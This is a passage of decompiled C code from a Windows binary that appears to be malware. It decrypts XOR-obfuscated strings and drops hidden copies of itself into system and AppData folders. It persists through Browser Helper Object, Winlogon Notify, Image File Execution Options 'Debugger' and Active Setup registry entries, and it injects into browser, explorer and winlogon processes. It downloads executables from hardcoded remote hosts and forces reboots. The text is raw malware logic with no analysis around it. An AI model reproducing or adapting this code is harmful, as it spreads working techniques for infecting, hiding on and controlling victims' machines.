							_t364 =  &(_t364[1]);
						}
						while(1) {
							__eflags = 0x4072a0 - 0x407aa0;
							if(0x4072a0 >= 0x407aa0) {
								break;
							}
							 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
							__eflags =  *0x4072a0;
							 *(_t799 + 0x40) =  *(_t799 + 0x40) ^ _t734;
						}
						_push(0x4122b0);
						_push(0x407aa0);
						_t697 =  &(_t802[0x410]);
						_push(_t697);
						L00405E20();
						_push(0x4072a0);
						L00405E30();
						_t367 = RegCreateKeyA(0x80000002, _t697,  &(_t802[0x26]));
						__eflags = _t367;
						if(_t367 != 0) {
							L72:
							_t369 = E004030DE( &(_t802[0x1ee]));
							_t802[0x26] = _t369;
							__eflags = _t369;
							if(_t369 == 0) {
								L92:
								_t370 = E004010B2();
								__eflags = _t370;
								_t742 = _t370;
								if(_t370 == 0) {
									_t742 = 0x42;
								}
								_t802[0x1ee] = _t742;
								_t371 = E004010B2();
								__eflags = _t371;
								_t743 = _t371;
								if(_t371 == 0) {
									_t743 = 0x4d;
								}
								_t802[0x162] = _t743;
								_push( *0x4120b0);
								_push( &(_t802[0x163]));
								L00405E20();
								_push( &(_t802[0x55a]));
								_push( &(_t802[0x1ac]));
								L00405E20();
								_t781 = _t802[5];
								_t375 = _t781 + _t799;
								while(1) {
									__eflags = _t781 - _t375;
									if(_t781 >= _t375) {
										break;
									}
									 *_t781 =  *_t781 ^ _t802[0x162] & 0x000000ff;
									_t781 =  &(_t781[0]);
									_t375 = _t802[5] + _t799;
								}
								_t698 =  &(_t802[0x517]);
								_t376 = ExpandEnvironmentStringsA("%AppData%\\", _t698, 0x104);
								__eflags = _t376;
								if(_t376 == 0) {
									L103:
									_t699 =  &(_t802[0x516]);
									_t377 = GetTempPathA(0x104, _t699);
									__eflags = _t377;
									if(_t377 == 0) {
										L111:
										E00401029(_t802[5]);
										_t700 =  &(_t802[0x387]);
										_t380 = GetSystemDirectoryA(_t700, 0x104);
										_push(0x80);
										_push( *0x4120c0);
										_push(0x41103e);
										_push(_t700);
										L00405E30();
										L00405E30();
										SetFileAttributesA(_t380, _t380);
										_t382 = CreateFileA(_t700, 0x40000000, 0, 0, 2, 0x80, 0);
										_t802[0x28] = _t382;
										__eflags = _t382;
										if(_t382 == 0) {
											L118:
											_t383 = GetLastError();
											__eflags = _t383 - 0x20;
											if(_t383 != 0x20) {
												_t701 =  &(_t802[0x387]);
												_t384 = ExpandEnvironmentStringsA("%AppData%\\", _t701, 0x104);
												_push(0x80);
												_push( *0x4120c0);
												L00405E30();
												SetFileAttributesA(_t384, _t701);
												_t386 = CreateFileA(_t701, 0x40000000, 0, 0, 2, 0x80, 0);
												_t802[0x28] = _t386;
												__eflags = _t386;
												if(_t386 == 0) {
													L122:
													_t387 = GetLastError();
													__eflags = _t387 - 0x20;
													if(_t387 == 0x20) {
														goto L119;
													}
													_t558 = GetTempPathA(0x104, _t701);
													_push(0x80);
													_push( *0x4120c0);
													L00405E30();
													SetFileAttributesA(_t558, _t701);
													_t560 = CreateFileA(_t701, 0x40000000, 0, 0, 2, 0x80, 0);
													_t802[0x28] = _t560;
													__eflags = _t560;
													if(_t560 == 0) {
														L125:
														_t561 = GetLastError();
														__eflags = _t561 - 0x20;
														if(_t561 == 0x20) {
															goto L119;
														}
														L128:
														_t702 =  &(_t802[0x343]);
														_t392 = ExpandEnvironmentStringsA("%AppData%\\", _t702, 0x104);
														_push(0x80);
														_push( *0x4120d0);
														L00405E30();
														SetFileAttributesA(_t392, _t702);
														_t394 = CreateFileA(_t702, 0x40000000, 0, 0, 2, 0x80, 0);
														_t802[0x28] = _t394;
														__eflags = _t394;
														_t744 = _t394;
														if(_t394 == 0) {
															L130:
															_t703 =  &(_t802[0x342]);
															_t395 = GetTempPathA(0x104, _t703);
															_push(0x80);
															_push( *0x4120d0);
															L00405E30();
															SetFileAttributesA(_t395, _t703);
															_t397 = CreateFileA(_t703, 0x40000000, 0, 0, 2, 0x80, 0);
															_t802[0x28] = _t397;
															__eflags = _t397;
															_t744 = _t397;
															if(_t397 == 0) {
																L133:
																_t802[0x342] = 0;
																L134:
																__eflags = _t802[0x342];
																if(_t802[0x342] != 0) {
																	CreateFileA( &(_t802[0x348]), 0x80000000, 1, 0, 3, 0, 0);
																}
																_t704 =  &(_t802[0x2b]);
																GetSystemDirectoryA(_t704, 0x104);
																_push(0x41103e);
																_push(_t704);
																L00405E30();
																E004012C2(_t704);
																ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t704, 0x104);
																E004012C2(_t704);
																ExpandEnvironmentStringsA("%AppData%\\", _t704, 0x104);
																E004012C2(_t704);
																_t407 = 0x407220;
																while(1) {
																	__eflags = _t407 - 0x40724d;
																	if(_t407 >= 0x40724d) {
																		break;
																	}
																	 *_t407 =  *_t407 ^ 0x000000d4;
																	_t407 =  &(_t407[1]);
																}
																_t408 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t802[0x26]));
																__eflags = _t408;
																if(_t408 == 0) {
																	L141:
																	__eflags = _t802[0xb];
																	if(_t802[0xb] == 0) {
																		_t717 =  &(_t802[0x55a]);
																		_t548 = E00401251(_t802[0x26]);
																		_push(_t717);
																		L00405E40();
																		_t549 = _t548 + 1;
																		__eflags = _t549;
																		RegSetValueExA(_t802[0x2b],  *0x4120b0, 0, 1, _t717, _t549);
																	}
																	RegDeleteValueA(_t802[0x27], "winrnt.exe");
																	RegCloseKey(_t802[0x26]);
																	L144:
																	__eflags =  *0x412100 - 2;
																	if( *0x412100 != 2) {
																		L184:
																		CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t802[0x27])));
																		_t413 = 0x407000;
																		while(1) {
																			__eflags = _t413 - 0x407060;
																			if(_t413 >= 0x407060) {
																				break;
																			}
																			 *_t413 =  *_t413 ^ 0x000000d4;
																			_t413 =  &(_t413[1]);
																		}
																		_t802[0xc] = 0;
																		while(1) {
																			E004011CF(0x80000002, 0x407000);
																			__eflags = _t802[0xc] - 9;
																			if(_t802[0xc] <= 9) {
																				goto L223;
																			}
																			_t802[0x16] = 0;
																			_t802[0x17] = 0;
																			_t472 = E004025C3();
																			__eflags = _t472;
																			if(_t472 != 0) {
																				L220:
																				 *_t802 = 0;
																				L224:
																				_t802[0xd] = 0x3b;
																				do {
																					__eflags = _t802[0x342];
																					if(_t802[0x342] != 0) {
																						_push(0);
																						_push("opera.exe");
																						_push("seamonkey.exe");
																						_push("mozilla.exe");
																						_push("firefox.exe");
																						_push("iexplore.exe");
																						_push("explorer.exe");
																						E0040318D( &(_t802[0x349]));
																						_t802 =  &(_t802[8]);
																					}
																					__eflags = _t802[0xa];
																					if(_t802[0xa] != 0) {
																						_t708 =  &(_t802[0x3cb]);
																						SetFileAttributesA(_t708, 0x21);
																						_t449 = RegCreateKeyA(0x80000002,  &(_t802[0x40f]),  &(_t802[0x26]));
																						__eflags = _t449;
																						if(_t449 == 0) {
																							E00401251(_t802[0x26]);
																							_t802[0x27] = 1;
																							_t453 = RegSetValueExA(_t802[0x2b], "IsInstalled", 0, 4,  &(_t802[0x28]), 4);
																							_push(_t708);
																							L00405E40();
																							_t454 = _t453 + 1;
																							__eflags = _t454;
																							RegSetValueExA(_t802[0x2b], "StubPath", 0, 1, _t708, _t454);
																							RegCloseKey(_t802[0x26]);
																						}
																					}
																					__eflags = _t802[0xb];
																					_t782 =  &(_t802[0x26]);
																					if(_t802[0xb] == 0) {
																						_t416 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t782);
																						__eflags = _t416;
																						if(_t416 == 0) {
																							L235:
																							_t705 =  &(_t802[0x55a]);
																							_push(_t705);
																							L00405E40();
																							_t417 = _t416 + 1;
																							__eflags = _t417;
																							_push(_t417);
																							_push(_t705);
																							_push(1);
																							_push(0);
																							_push( *0x4120b0);
																							goto L236;
																						}
																						_t416 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t782);
																						__eflags = _t416;
																						if(_t416 != 0) {
																							goto L237;
																						}
																						goto L235;
																					} else {
																						_t709 =  &(_t802[0x48f]);
																						SetFileAttributesA(_t709, 0x21);
																						_t423 = RegCreateKeyA(0x80000002, 0x408720, _t782);
																						__eflags = _t423;
																						if(_t423 != 0) {
																							L237:
																							__eflags = _t802[9];
																							if(_t802[9] == 0) {
																								goto L247;
																							}
																							_t706 =  &(_t802[0x27]);
																							_t424 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t706, 0);
																							__eflags = _t424;
																							if(_t424 == 0) {
																								L240:
																								RegSetValueExA(_t802[0x2b], "SubshellState", 0, 3,  &(_t802[0x1ef]), 0x22a);
																								RegCloseKey(_t802[0x26]);
																								L241:
																								_t707 =  &(_t802[0x387]);
																								SetFileAttributesA(_t707, 0x21);
																								__eflags =  *0x412100 - 2;
																								_t785 =  &(_t802[0x26]);
																								if( *0x412100 != 2) {
																									_t429 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t785);
																									__eflags = _t429;
																									if(_t429 != 0) {
																										goto L247;
																									}
																									_push(_t707);
																									L00405E40();
																									RegSetValueExA(_t802[0x2b], 0, 0, 1, _t707, _t429 + 1);
																									RegSetValueExA(_t802[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																									RegCloseKey(_t802[0x26]);
																									_t434 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t785);
																									__eflags = _t434;
																									if(_t434 != 0) {
																										goto L247;
																									}
																									L246:
																									RegCloseKey(_t802[0x26]);
																									goto L247;
																								}
																								_t436 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t785);
																								__eflags = _t436;
																								if(_t436 != 0) {
																									goto L247;
																								}
																								_t438 = E00401251(_t802[0x26]);
																								_push(_t707);
																								L00405E40();
																								RegSetValueExA(_t802[0x2b], "DLLName", 0, 1, _t707, _t438 + 1);
																								RegSetValueExA(_t802[0x2b], "Startup", 0, 1, "Startup", 8);
																								goto L246;
																							}
																							_t442 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t706, 0);
																							__eflags = _t442;
																							if(_t442 != 0) {
																								goto L241;
																							}
																							goto L240;
																						}
																						_t444 = E00401251(_t802[0x26]);
																						_push(_t709);
																						L00405E40();
																						_push(_t444 + 1);
																						_push(_t709);
																						_push(1);
																						_push(0);
																						_push("Debugger");
																						L236:
																						RegSetValueExA(_t802[0x2b], ??, ??, ??, ??, ??);
																						RegCloseKey(_t802[0x26]);
																						goto L237;
																					}
																					L247:
																					SetFileAttributesA( &(_t802[0x55b]), 0x21);
																					Sleep(0x3e8);
																					_t324 =  &(_t802[0xd]);
																					 *_t324 = _t802[0xd] - 1;
																					__eflags =  *_t324;
																				} while ( *_t324 >= 0);
																				_t460 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t802[0x12]), 0);
																				__eflags = _t460;
																				if(_t460 == 0) {
																					_t802[0x10] = 4;
																					_t713 =  &(_t802[0x10]);
																					_t462 = RegQueryValueExA(_t802[0x16], "g00d d0gg", 0, 0, _t713,  &(_t802[0x10]));
																					__eflags = _t462;
																					if(_t462 == 0) {
																						_t465 = _t802[0xf] - 1;
																						__eflags = _t465;
																						_t802[0xf] = _t465;
																						if(_t465 == 0) {
																							RegDeleteValueA(_t802[0x12], "g00d d0gg");
																							Sleep(0x1388);
																							__eflags =  *0x412100 - 2;
																							if( *0x412100 != 2) {
																								ExitWindowsEx(6, 0);
																							} else {
																								RtlAdjustPrivilege(0x13, 1, 0,  &(_t802[0xe]));
																								 *0x412240(1);
																							}
																						} else {
																							RegSetValueExA(_t802[0x16], "g00d d0gg", 0, 4, _t713, 4);
																						}
																					}
																					RegCloseKey(_t802[0x11]);
																				}
																				continue;
																			}
																			_t474 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t802[0x1c]), 0);
																			__eflags = _t474;
																			if(_t474 != 0) {
																				__eflags =  *_t802;
																				if( *_t802 == 0) {
																					goto L224;
																				}
																				L222:
																				_t802[0xc] = 0;
																				goto L224;
																			}
																			_t800 =  &(_t802[0x19]);
																			GetSystemTimeAsFileTime(_t800);
																			_t802[0x18] = 8;
																			_t777 =  &(_t802[0x17]);
																			_t476 = RegQueryValueExA(_t802[0x20], "ConnPred", 0,  &(_t802[0x17]), _t777,  &(_t802[0x18]));
																			__eflags = _t476;
																			if(_t476 != 0) {
																				L193:
																				__eflags = E004014D8(_t800, 0x412070) - 0x4af;
																				if(__eflags <= 0) {
																					L204:
																					__eflags =  *0x412080;
																					if( *0x412080 == 0) {
																						L207:
																						_t802[0x18] = 8;
																						__eflags = RegQueryValueExA(_t802[0x20], "UseExtProfile", 0,  &(_t802[0x17]), _t777,  &(_t802[0x18]));
																						if(__eflags != 0) {
																							L209:
																							_t481 = E00402427(__eflags);
																							__eflags = _t481;
																							if(_t481 != 0) {
																								L219:
																								RegCloseKey(_t802[0x1b]);
																								goto L220;
																							}
																							_push(1);
																							_push(0);
																							_t484 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																							__eflags = _t484;
																							if(_t484 == 0) {
																								L212:
																								_t802[0x18] = 8;
																								_t711 =  &(_t802[0x13]);
																								_t486 = RegQueryValueExA(_t802[0x20], "UseDflProfile", 0,  &(_t802[0x17]),  &(_t802[0x13]),  &(_t802[0x18]));
																								__eflags = _t486;
																								if(_t486 != 0) {
																									_t495 = _t802[0x16] + 0x1162f100;
																									__eflags = _t495;
																									asm("adc edx, 0xffffff9b");
																									_t802[0x12] = _t495;
																									_t802[0x13] = _t802[0x17];
																								}
																								__eflags = E004014D8( &(_t802[0x19]), _t711) - 0x152ab;
																								if(__eflags <= 0) {
																									goto L219;
																								} else {
																									_t489 = E00402427(__eflags);
																									__eflags = _t489;
																									if(_t489 != 0) {
																										goto L219;
																									}
																									_push(3);
																									_push(0);
																									_t491 = E0040211B("tombul.gif", 0);
																									__eflags = _t491;
																									if(_t491 == 0) {
																										goto L219;
																									}
																									_push(8);
																									_push(_t800);
																									_push(0xb);
																									_push(0);
																									_push("UseDflProfile");
																									L218:
																									RegSetValueExA(_t802[0x20], ??, ??, ??, ??, ??);
																									RegCloseKey(_t802[0x1b]);
																									 *_t802 = 1;
																									goto L222;
																								}
																							}
																							_t802[0x16] = _t802[0x19].dwLowDateTime;
																							_t802[0x17] = _t802[0x1a];
																							_push(8);
																							_push(_t800);
																							_push(0xb);
																							_push(0);
																							_push("UseExtProfile");
																							goto L218;
																						}
																						__eflags = E004014D8( &(_t802[0x19]),  &(_t802[0x16])) - 0x152ab;
																						if(__eflags <= 0) {
																							goto L212;
																						}
																						goto L209;
																					}
																					_push(3);
																					_push(0);
																					_t500 = E0040211B("grazie.gif", 0);
																					__eflags = _t500;
																					if(_t500 == 0) {
																						goto L207;
																					}
																					_t802[0x16] = _t802[0x19].dwLowDateTime;
																					_t802[0x17] = _t802[0x1a];
																					_push(8);
																					_push(_t800);
																					_push(0xb);
																					_push(0);
																					_push("ConnPred");
																					goto L218;
																				}
																				_t502 = E00402427(__eflags);
																				__eflags = _t502;
																				if(_t502 != 0) {
																					goto L219;
																				}
																				_t504 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																				_t784 = 0;
																				__eflags = _t504;
																				_t712 = _t504;
																				if(_t504 != 0) {
																					_t509 = E00401E00(_t504,  &(_t802[0x15]), 2);
																					__eflags = _t509 - 2;
																					if(_t509 == 2) {
																						_t784 = 1;
																					}
																				}
																				E00401F59(_t712);
																				__eflags = _t784;
																				if(_t784 == 0) {
																					 *0x412080 = 0;
																				} else {
																					 *0x412070 = _t802[0x19];
																					_t508 = 0;
																					__eflags = _t802[0x14] - 0x49;
																					 *0x412074 = _t802[0x1a];
																					if(_t802[0x14] == 0x49) {
																						__eflags = _t802[0x14] - 0x54;
																						if(_t802[0x14] == 0x54) {
																							_t508 = 1;
																						}
																					}
																					 *0x412080 = _t508;
																				}
																				goto L204;
																			}
																			_t511 = E004014D8(_t800, _t777);
																			__eflags = _t511 - 0x152ab;
																			if(_t511 <= 0x152ab) {
																				goto L207;
																			}
																			goto L193;
																			L223:
																			_t287 =  &(_t802[0xc]);
																			 *_t287 = _t802[0xc] + 1;
																			__eflags =  *_t287;
																			goto L224;
																		}
																	}
																	_t512 = 0x4071e0;
																	while(1) {
																		__eflags = _t512 - 0x407214;
																		if(_t512 >= 0x407214) {
																			break;
																		}
																		 *_t512 =  *_t512 ^ 0x000000d4;
																		_t512 =  &(_t512[1]);
																	}
																	_t513 = 0x4071c3;
																	while(1) {
																		__eflags = _t513 - 0x4071cf;
																		if(_t513 >= 0x4071cf) {
																			break;
																		}
																		 *_t513 =  *_t513 ^ 0x000000d4;
																		_t513 =  &(_t513[1]);
																	}
																	_t786 =  &(_t802[0x26]);
																	_t514 = RegCreateKeyA(0x80000002, 0x4071e0, _t786);
																	__eflags = _t514;
																	if(_t514 == 0) {
																		RegSetValueExA(_t802[0x2b], 0x4071c3, 0, 4,  &(_t802[0x28]), 4);
																		RegCloseKey(_t802[0x26]);
																	}
																	_t515 = 0x4071a0;
																	while(1) {
																		__eflags = _t515 - 0x4071c2;
																		if(_t515 >= 0x4071c2) {
																			break;
																		}
																		 *_t515 =  *_t515 ^ 0x000000d4;
																		_t515 =  &(_t515[1]);
																	}
																	_t516 = 0x407177;
																	while(1) {
																		__eflags = _t516 - 0x407188;
																		if(_t516 >= 0x407188) {
																			break;
																		}
																		 *_t516 =  *_t516 ^ 0x000000d4;
																		_t516 =  &(_t516[1]);
																	}
																	_t517 = 0x407160;
																	while(1) {
																		__eflags = _t517 - 0x407176;
																		if(_t517 >= 0x407176) {
																			break;
																		}
																		 *_t517 =  *_t517 ^ 0x000000d4;
																		_t517 =  &(_t517[1]);
																	}
																	_t518 = 0x40714a;
																	while(1) {
																		__eflags = _t518 - 0x40715f;
																		if(_t518 >= 0x40715f) {
																			break;
																		}
																		 *_t518 =  *_t518 ^ 0x000000d4;
																		_t518 =  &(_t518[1]);
																	}
																	_t519 = 0x407135;
																	while(1) {
																		__eflags = _t519 - 0x407149;
																		if(_t519 >= 0x407149) {
																			break;
																		}
																		 *_t519 =  *_t519 ^ 0x000000d4;
																		_t519 =  &(_t519[1]);
																	}
																	_t520 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t786);
																	__eflags = _t520;
																	if(_t520 == 0) {
																		_t716 =  &(_t802[0x28]);
																		RegSetValueExA(_t802[0x2b], 0x407177, 0, 4, _t716, 4);
																		RegSetValueExA(_t802[0x2b], 0x407160, 0, 4, _t716, 4);
																		RegSetValueExA(_t802[0x2b], 0x40714a, 0, 4, _t716, 4);
																		RegSetValueExA(_t802[0x2b], 0x407135, 0, 4, _t716, 4);
																		RegCloseKey(_t802[0x26]);
																	}
																	_t521 = 0x4070c0;
																	while(1) {
																		__eflags = _t521 - 0x407134;
																		if(_t521 >= 0x407134) {
																			break;
																		}
																		 *_t521 =  *_t521 ^ 0x000000d4;
																		_t521 =  &(_t521[1]);
																	}
																	_t522 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t786);
																	__eflags = _t522;
																	if(_t522 != 0) {
																		goto L184;
																	}
																	_t524 = E00401000(0x8000);
																	_t802[0x1d] = 0x4000;
																	_t787 = _t524;
																	_t525 = 0x407080;
																	_t802[0x27] = 0x4000;
																	while(1) {
																		__eflags = _t525 - 0x4070a4;
																		if(_t525 >= 0x4070a4) {
																			break;
																		}
																		 *_t525 =  *_t525 ^ 0x000000d4;
																		_t525 =  &(_t525[1]);
																	}
																	_t802[0xd] = 0;
																	while(1) {
																		_t234 =  &(_t787[0x4000]); // 0x4000
																		_t714 = _t234;
																		_t529 = RegEnumValueA(_t802[0x2d], _t802[0x13], _t787,  &(_t802[0x2b]), 0,  &(_t802[0x1e]), _t234,  &(_t802[0x1d]));
																		__eflags = _t529;
																		if(_t529 != 0) {
																			break;
																		}
																		__eflags = _t802[0x1c] - 1;
																		if(_t802[0x1c] == 1) {
																			_t531 = E00401311(_t714, 0x40708d);
																			__eflags = _t531;
																			if(_t531 != 0) {
																				RegDeleteValueA(_t802[0x27], _t787);
																			}
																		}
																		_t229 =  &(_t802[0xd]);
																		 *_t229 = _t802[0xd] + 1;
																		__eflags =  *_t229;
																		_t802[0x1d] = 0x4000;
																		_t802[0x27] = 0x4000;
																	}
																	_t715 =  &(_t802[0x55a]);
																	_t534 = wsprintfA(_t787, 0x407080, _t715) + 1;
																	__eflags = _t534;
																	_t802 =  &(_t802[3]);
																	RegSetValueExA(_t802[0x2b], _t715, 0, 1, _t787, _t534);
																	E00401029(_t787);
																	RegCloseKey(_t802[0x26]);
																	goto L184;
																}
																_t552 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t802[0x26]));
																__eflags = _t552;
																if(_t552 != 0) {
																	goto L144;
																}
																goto L141;
															}
															__eflags = _t397 - 0xffffffff;
															if(_t397 == 0xffffffff) {
																goto L133;
															}
															L132:
															WriteFile(_t744, 0x408840, 0x5e00,  &(_t802[0x28]), 0);
															CloseHandle(_t802[0x28]);
															goto L134;
														}
														__eflags = _t394 - 0xffffffff;
														if(_t394 != 0xffffffff) {
															goto L132;
														}
														goto L130;
													}
													__eflags = _t560 + 1;
													if(_t560 + 1 != 0) {
														L113:
														WriteFile(_t802[0x2c], 0x40e640, 0x1400,  &(_t802[0x28]), 0);
														__eflags = _t802[3];
														if(_t802[3] != 0) {
															SetFileTime(_t802[0x2b],  &(_t802[0x21]),  &(_t802[0x22]),  &(_t802[0x23]));
														}
														CloseHandle(_t802[0x28]);
														_t802[9] = 1;
														_push(0);
														_push("winlogon.exe");
														_t718 =  &(_t802[0x388]);
														_t566 = E0040318D(_t718);
														_t802 =  &(_t802[3]);
														__eflags = _t566;
														if(_t566 == 0) {
															_push(0);
															_push("explorer.exe");
															E0040318D(_t718);
															_t802 =  &(_t802[3]);
														}
														_push(0);
														_push("kernel32.dll");
														_push(_t718);
														L127:
														E0040318D();
														_t802 =  &(_t802[3]);
														CreateFileA( &(_t802[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
														goto L128;
													}
													goto L125;
												}
												__eflags = _t386 + 1;
												if(_t386 + 1 != 0) {
													goto L113;
												}
												goto L122;
											}
											L119:
											_t802[9] = 1;
											_push(0);
											_push("kernel32.dll");
											_push( &(_t802[0x388]));
											goto L127;
										}
										__eflags = _t382 + 1;
										if(_t382 + 1 == 0) {
											goto L118;
										}
										goto L113;
									} else {
										_t788 =  &(_t802[0x16a]);
										_t574 = GetTempFileNameA(_t699, "tmp", 0, _t788);
										__eflags = _t574;
										if(_t574 == 0) {
											goto L111;
										}
										_t575 = CreateFileA(_t788, 0x40000000, 0, 0, 2, 0x80, 0);
										_t802[0x28] = _t575;
										__eflags = _t575;
										if(_t575 == 0) {
											goto L111;
										}
										__eflags = _t575 + 1;
										if(_t575 + 1 == 0) {
											goto L111;
										}
										L108:
										WriteFile(_t802[0x2c], _t802[8], _t799,  &(_t802[0x28]), 0);
										CloseHandle(_t802[0x28]);
										CreateFileA( &(_t802[0x170]), 0x80000000, 1, 0, 3, 0, 0);
										_t789 =  &(_t802[0x1ee]);
										_t768 =  &(_t802[0x162]);
										_t738 =  &(_t802[0x278]);
										while(1) {
											__eflags = _t789 - _t738;
											if(_t789 >= _t738) {
												goto L111;
											}
											_t583 = _t802[0x1ee] & 0x000000ff ^  *_t768;
											_t768 =  &(_t768[0]);
											 *_t789 = _t583;
											_t789 =  &(_t789[1]);
										}
										goto L111;
									}
								}
								_t790 =  &(_t802[0x16a]);
								_push(_t790);
								_push(0);
								_push(0x411040);
								_push(_t698);
								L00405E90();
								__eflags = _t376;
								if(_t376 == 0) {
									goto L103;
								}
								_push(0);
								_push(0x80);
								_push(2);
								_push(0);
								_push(0);
								_push(0x40000000);
								_push(_t790);
								L00405DB0();
								_t802[0x28] = _t376;
								__eflags = _t376;
								if(_t376 == 0) {
									goto L103;
								}
								__eflags = _t376 + 1;
								if(_t376 + 1 != 0) {
									goto L108;
								}
								goto L103;
							}
							RegDeleteValueA(_t369, "SubshellState");
							RegCloseKey(_t802[0x26]);
							_t791 =  &(_t802[0x1ee]);
							_t769 =  &(_t802[0x162]);
							_t739 =  &(_t802[0x278]);
							while(1) {
								__eflags = _t791 - _t739;
								if(_t791 >= _t739) {
									break;
								}
								_t610 = _t802[0x1ee] & 0x000000ff ^  *_t791;
								_t791 =  &(_t791[0]);
								 *_t769 = _t610;
								_t769 =  &(_t769[1]);
							}
							_push( *0x4120b0);
							_t589 =  &(_t802[0x163]);
							_push(_t589);
							L00405E50();
							__eflags = _t589;
							if(_t589 != 0) {
								L78:
								_t719 =  &(_t802[0x16b]);
								SetFileAttributesA(_t719, 0x80);
								DeleteFileA(_t719);
								goto L92;
							}
							_push( &(_t802[0x55a]));
							_t593 =  &(_t802[0x1ac]);
							_push(_t593);
							L00405E50();
							__eflags = _t593;
							if(_t593 == 0) {
								_t595 = CreateFileA( &(_t802[0x170]), 0x80000000, 1, 0, 3, 0, 0);
								_t802[0x28] = _t595;
								__eflags = _t595;
								if(_t595 == 0) {
									goto L78;
								}
								__eflags = _t595 - 0xffffffff;
								if(_t595 == 0xffffffff) {
									goto L78;
								}
								_t596 = GetFileSize(_t595, 0);
								_t802[0x1d] = _t596;
								__eflags = _t596 - _t799;
								if(_t596 == _t799) {
									_t599 = E00401000(_t799);
									_t792 = _t599;
									ReadFile(_t802[0x2c], _t599, _t799,  &(_t802[0x28]), 0);
									_t720 = _t802[0x1d];
									_t770 = _t792;
									_t778 = _t802[5];
									__eflags = _t792 - _t792 + _t720;
									while(__eflags < 0) {
										_t740 =  *_t770 & 0x000000ff;
										__eflags = _t802[0x162] - ( *_t778 & 0x000000ff);
										if(__eflags == 0) {
											__eflags = _t740;
										}
										if(__eflags == 0) {
											_t770 =  &(_t770[1]);
											_t778 =  &(_t778[1]);
											__eflags = _t770 - _t792 + _t720;
											continue;
										} else {
											E00401029(_t792);
											goto L82;
										}
									}
									E00401029(_t792);
									goto L111;
								}
								L82:
								CloseHandle(_t802[0x28]);
							}
							goto L78;
						}
						_t721 =  &(_t802[0x3cb]);
						_t611 = GetSystemDirectoryA(_t721, 0x104);
						_push( *0x412090);
						_push(0x41103e);
						_push(_t721);
						L00405E30();
						_push(_t611);
						L00405E30();
						_t612 = 0x407260;
						while(1) {
							__eflags = _t612 - 0x407286;
							if(_t612 >= 0x407286) {
								break;
							}
							 *_t612 =  *_t612 ^ 0x000000d4;
							_t612 =  &(_t612[1]);
						}
						_t613 = CreateMutexA(0, 0, "h`r@");
						_t802[0x28] = _t613;
						__eflags = _t613;
						if(_t613 == 0) {
							Sleep(0x7d0);
						} else {
							WaitForSingleObject(_t613, 0x2710);
							CloseHandle(_t802[0x28]);
						}
						_t722 =  &(_t802[0x3cb]);
						SetFileAttributesA(_t722, 0x80);
						_t615 = CreateFileA(_t722, 0x40000000, 0, 0, 2, 0x80, 0);
						_t802[0x28] = _t615;
						__eflags = _t615;
						if(_t615 == 0) {
							L71:
							RegCloseKey(_t802[0x26]);
							RegDeleteKeyA(0x80000001,  &(_t802[0x40e]));
							goto L72;
						} else {
							__eflags = _t615 - 0xffffffff;
							if(_t615 == 0xffffffff) {
								goto L71;
							}
							WriteFile(_t615, 0x4072a0, 0x800,  &(_t802[0x28]), 0);
							_t620 = E004010B2();
							_t802[6] = _t620;
							__eflags = _t620;
							if(_t620 == 0) {
								_t802[6] = 0xc6;
							}
							_t622 = E00401000(_t799 + 0x64);
							 *((char*)(_t622 + _t799)) = 0;
							_t779 = _t622;
							_t793 = _t622;
							_t772 = _t802[5];
							_t623 = _t622 + _t799;
							while(1) {
								__eflags = _t793 - _t623;
								if(_t793 >= _t623) {
									break;
								}
								_t648 = _t802[6] & 0x000000ff ^  *_t772;
								_t772 =  &(_t772[0]);
								 *_t793 = _t648;
								_t793 = _t793 + 1;
								_t623 = _t779 + _t799;
							}
							_t624 =  &(_t802[0x55a]);
							_t723 = _t779 + _t799;
							_push(_t624);
							L00405E40();
							_t794 = _t723 +  &(_t624[1]);
							__eflags = _t794 - _t723 + 0x64;
							while(__eflags < 0) {
								 *_t794 = E004010B2();
								_t794 = _t794 + 1;
								_t103 = _t799 + 0x64; // 0x64
								__eflags = _t794 - _t779 + _t103;
							}
							 *(_t779 + _t799 + 1) = _t799;
							_t725 = _t779 + _t799;
							_push( &(_t802[0x55a]));
							_t795 = _t725;
							_push( &(_t725[1]));
							L00405E20();
							_t627 =  &(_t725[0x19]);
							while(1) {
								__eflags = _t795 - _t627;
								if(_t795 >= _t627) {
									break;
								}
								 *_t795 =  *_t795 ^ _t802[6] & 0x000000ff;
								_t795 =  &(_t795[0]);
								_t112 = _t799 + 0x64; // 0x64
								_t627 = _t779 + _t112;
							}
							WriteFile(_t802[0x2c], _t779, _t799 + 0x64,  &(_t802[0x28]), 0);
							E00401029(_t779);
							__eflags = _t802[3];
							if(_t802[3] != 0) {
